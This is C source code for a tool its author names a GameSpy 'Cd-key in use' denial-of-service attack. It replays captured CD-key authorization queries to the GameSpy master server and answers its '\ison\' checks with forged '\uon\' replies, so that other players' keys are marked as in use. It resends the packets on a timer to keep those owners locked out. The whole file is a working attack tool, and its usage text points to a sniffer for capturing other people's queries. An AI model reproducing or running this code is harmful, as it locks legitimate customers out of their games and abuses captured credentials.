/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stricmp strcasecmp
#endif



#define VER         "0.2"
#define BUFFSZ      4096
#define TIMEOUT     3
#define MSHOST      "master.gamespy.com"
#define MSPORT      29910
#define STATUS      "\\final\\" \
                    "\\queryid\\1.1"

#define SEND(x,y)   sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer));
#define SENDKEY(x)  sendto(sd, buffkey[x], keylen[x], 0, (struct sockaddr *)&keypeer, sizeof(keypeer));



int gs_recv(int sd, struct sockaddr_in *peer, u_char *buff, int buffsz);
u_char *dissect(u_char *buff, u_char *find);
void gamespyxor(u_char *string, int len);
int timeout(int sock, int secs);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct sockaddr_in  keypeer,    // backup sockaddr_in!!!
                        peer,
                        peerl;
    FILE    *fd;
    u_int   ip;
    time_t  oldt,                   // required for compatibility
            newt;
    int     sd,
            len,
            *keylen    = NULL,
            skey,
            i,
            on         = 1,
            first      = 1,
            waitsec,
            waitsecfix = 50,
            keyc       = 0,
            quitinval  = 1,
            keyconfirm = 0;
    u_short msport     = MSPORT;
    u_char  buff[BUFFSZ + 1],
            **buffkey  = NULL,
            *mshost    = MSHOST,
            *pid,
            *ch,
            *resp,
            *p,
            *fname;

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);
    srand(time(NULL));

    fputs("\n"
        "Gamespy cd-key validation: \"Cd-key in use\" DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] <packet_file> <bind_port>\n"
            "\n"
            "Options:\n"
            "-m H[:P]   specify a different master server (H) and optional port (P)\n"
            "           default is %s:%hu\n"
            "-s SECS    minimum amount of seconds to wait for resending the authorization\n"
            "           packets (default %d <-> %d, use 0 for not resending them)\n"
            "-n         do not quit if one of the cd-keys is invalid\n"
            "-y         if your packet_file contains multiple queries the tool will ask\n"
            "           confirmation for each one of them (default is only the first)\n"
            "\n"
            " packet_file is a text file containing plain-text authorization queries like\n"
            "   \\auth\\\\pid\\123\\ch\\aBcDeFg\\resp\\0123456789abcdef0123...\n"
            " you can put multiple queries into the file, those invalid are automatically\n"
            " skipped showing a warning message. Only pid, ch and resp are needed.\n"
            " You can capture all these queries using my GsHsniff tool:\n"
            "   http://aluigi.org/papers/gshsniff.zip\n"
            " if packet_file is \"\" or NULL this tool will simply go in listening mode\n"
            "\n"
            " bind_port is the port you want to bind, a random port is ok\n"
            " This tool is already very verbose and shows ANY operation made by it\n"
            "\n",
            argv[0],
            mshost, msport,
            waitsecfix, waitsecfix + waitsecfix);
        exit(1);
    }

    argc -= 2;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case 'm': {
                mshost = argv[++i];
                p = strchr(mshost, ':');
                if(p) {
                    msport = atoi(p + 1);
                    *p = 0;
                }
                printf("- set master server   %s : %hu\n", mshost, msport);
                } break;
            case 's': waitsecfix = atoi(argv[++i]); break;
            case 'n': quitinval  = 0;               break;
            case 'y': keyconfirm = 1;               break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
                } break;
        }
    }

    printf("- Resolv master server hostname %s = \n", mshost);

    peer.sin_addr.s_addr  = resolv(mshost);
    printf("%s\n", inet_ntoa(peer.sin_addr));

    peer.sin_port         = htons(msport);
    peer.sin_family       = AF_INET;

    memcpy(&keypeer, &peer, sizeof(peer));

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(atoi(argv[argc + 1]));
    peerl.sin_family      = AF_INET;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- bind local port %hu\n", ntohs(peerl.sin_port));
    if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl))
      < 0) std_err();

    fname = argv[argc];
    if(!fname[0] || !stricmp(fname, "NULL")) goto listen_only;

    printf("- open file %s\n", fname);
    fd = fopen(fname, "rb");
    if(!fd) std_err();

    keyc = 0;
    while(fgets(buff, BUFFSZ, fd)) {
        for(p = buff; *p > '\r'; p++);          // remove cr/lf
        for(p--; p > buff; p--) {               // remove spaces at end
            if((*p != ' ') && (*p != '\t')) {
                p++;
                break;
            }
        }
        if(p == buff) continue;
        *p = 0;                                 // delimit
//        len = (p - buff) + 1;
        for(p = buff; *p && ((*p == ' ') || (*p == '\t')); p++);
//        if(p > buff) memmove(buff, p, len);     // remove spaces at beginning

        printf("- raw query read from the file:\n\n  %s\n\n", p);

        pid  = dissect(buff, "\\pid\\");
        ch   = dissect(buff, "\\ch\\");
        resp = dissect(buff, "\\resp\\");

        if(!pid || !ch || !resp) {
            printf("\n"
                "%s: you must use a valid authorization query\n"
                "       Yours doesn't contain \\pid\\, \\ch\\ or \\resp\\\n"
                "\n", first ? "Error" : "Alert");

            if(pid)  free(pid);
            if(ch)   free(ch);
            if(resp) free(resp);

            if(first) exit(1);
            continue;
        }

        if(strlen(resp) != 72) {
            fputs("\nError: the \\resp\\ field is invalid, it must be 72 chars long\n\n", stdout);
            exit(1);
        }

        printf(
            "- parameters found in the query:\n"
            "  pid  %s\n"
            "  ch   %s\n"
            "  resp %s\n"
            "       -> cd-key MD5       %.32s\n"
            "       -> client token     %.8s\n"
            "       -> verification MD5 %.32s\n"
            "\n",
            pid, ch, resp,
            resp, resp + 32, resp + 32 + 8);

        ip   = time(NULL) * rand();     // lame but almost random
        skey = rand() & 0xfff;          // as before

        printf(
            "- new randomized parameters:\n"
            "  ip   %s\n"
            "  skey %d\n"
            "\n",
            inet_ntoa(*(struct in_addr *)&ip), skey);

        len = snprintf(
            buff,
            BUFFSZ,
            "\\auth\\\\pid\\%s\\ch\\%s\\resp\\%s\\ip\\%u\\skey\\%d",
            pid,
            ch,
            resp,
            ip,
            skey);

        if((len <= 0) || (len > BUFFSZ)) {
            fputs("\nError: the query is bigger than the available buffer\n\n", stdout);
            exit(1);
        }

        free(pid);
        free(ch);
        free(resp);

        buffkey = realloc(buffkey, sizeof(u_char *) * (keyc + 1));  // copy everything
        buffkey[keyc] = malloc(len);
        keylen = realloc(keylen, sizeof(int) * (keyc + 1));
        keylen[keyc] = len;
        memcpy(buffkey[keyc], buff, len);

        printf("- new reassembled query:\n\n  %s\n\n", buff);

        if(first || keyconfirm) {
            fputs(
                "  Check if everything (moreover the new query) is correct.\n"
                "  Now I will send the query to the master server and check if the cd-key is\n"
                "  valid, then I will start to check any packet received from the master server\n"
                "  and I will reply to the needed queries like \\ison\\ (to know if the cd-key\n"
                "  is in use on this server) and \\status\\ (to know if this server is online).\n"
                "  If the file contains multiple queries this message is showed ONLY now.\n"
                "  Press RETURN to continue\n"
                "\n", stdout);
            fgetc(stdin);
        }

        printf("- contact   %s : %hu\n",
            inet_ntoa(peer.sin_addr), msport);

        fputs("- encode query\n", stdout);
        gamespyxor(buffkey[keyc], keylen[keyc]);

        fputs("- send query\n", stdout);
        SENDKEY(keyc);
        if(timeout(sd, TIMEOUT) < 0) {
            fputs("- timeout, resend query\n", stdout);
            SENDKEY(keyc);
            if(timeout(sd, TIMEOUT) < 0) {
                fputs("\n"
                    "Error: socket timeout, no reply received (check your connection or your IP has\n"
                    "       temporary banned by Gamespy but this is impossible and senseless)\n"
                    "\n", stdout);
                exit(1);
            }
        }

        len = gs_recv(sd, &peer, buff, BUFFSZ);
        if(!strstr(buff, "\\uok\\")) {
            if(strstr(buff, "\\ison\\")) {
                printf("\n"
                    "Error: seems you are reusing the same port you have used before\n"
                    "       In short, change the bind_port parameter to a different value\n"
                    "\n"
                    "  %s\n"
                    "\n", buff);
                exit(1);
            }
            printf("\n"
                "Error: the cd-key included in the file is not valid, check the reply:\n"
                "\n"
                "  %s\n"
                "\n", buff);
            if(quitinval) {
                exit(1);
            } else {
                continue;
            }
        }
        fputs("\n  Cd-key is VALID!!!\n\n", stdout);
        keyc++;

        first = 0;
    }

listen_only:

    if(first) {
        fputs(
            "- Your file doesn't contain queries, this tool will continue in case you have\n"
            "  already sent the key in a previous session and you want to continue the\n"
            "  listening mode\n",
            stdout);
    } else {
        printf(
            "- the packet with the cdkey authorization will be resent each X seconds\n"
            "  where X is a random value between %d and %d seconds\n",
            waitsecfix, waitsecfix + waitsecfix);
    }

    fputs("- started listening mode (server):\n", stdout);

    waitsec = waitsecfix;
    oldt = time(NULL);

    if(!waitsecfix) {
        for(i = 0; i < keyc; i++) free(buffkey[i]);
        free(buffkey);
        free(keylen);
        first = 1;
    }

    for(;;) {
        if(!first) {
            if(timeout(sd, waitsec) < 0) {
                printf("- resend the %d key packets\n", keyc);
                for(i = 0; i < keyc; i++) {
                    SENDKEY(i);
                    sleep(0);
                }
            }

            newt = time(NULL);
            waitsec -= (newt - oldt);
            oldt = newt;

            if(waitsec <= 0) {
                waitsec = waitsecfix + (rand() % waitsecfix);
                printf("  next resend after %d seconds\n", waitsec);
            }
        }

        len = gs_recv(sd, &peer, buff, BUFFSZ);
        printf("  %s : %hu\n  %s\n",
            inet_ntoa(peer.sin_addr), ntohs(peer.sin_port),
            buff);

        if(strstr(buff, "\\ison\\")) {
            p = strstr(buff, "\\skey\\");
            if(p) {
                len = sprintf(
                    buff,
                    "\\uon\\\\skey\\%d",
                    atoi(p + 6));

                printf("- send encoded \\uon\\ reply:\n  %s\n", buff);
                gamespyxor(buff, len);
                SEND(buff, len);
            } else {
                fputs("- no \\skey\\ found in the query, really strange...\n", stdout);
            }

        } else if(strstr(buff, "\\status\\")) {
            fputs("- send minimal status reply\n", stdout);
            SEND(STATUS, sizeof(STATUS) - 1);
        }
    }

    close(sd);
    return(0);
}



int gs_recv(int sd, struct sockaddr_in *peer, u_char *buff, int buffsz) {
    int     len,
            psz = sizeof(struct sockaddr_in);

    len = recvfrom(sd, buff, buffsz, 0, (struct sockaddr *)peer, &psz);
//    if(len < 0) std_err();
    if(len < 0) {
        buff[0] = 0;
        return(0);
    }

    buff[len] = 0;
    if(*buff == ';') {
        fputs("- decode reply\n", stdout);
        gamespyxor(buff, len);
    }

    return(len);
}



u_char *dissect(u_char *buff, u_char *find) {
    u_char  *ret = NULL,
            *p;

    ret = strstr(buff, find);
    if(ret) {
        ret += strlen(find);
        p = strchr(ret, '\\');
        if(p) *p = 0;
        ret = strdup(ret);
        if(p) *p = '\\';
    }
    return(ret);
}



void gamespyxor(u_char *data, int len) {
    const static u_char gamespy[] = "gamespy";
    u_char  *gs;

    for(gs = (u_char *)gamespy; len; len--, gs++, data++) {
        if(!*gs) gs = (u_char *)gamespy;
        *data ^= *gs;
    }
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



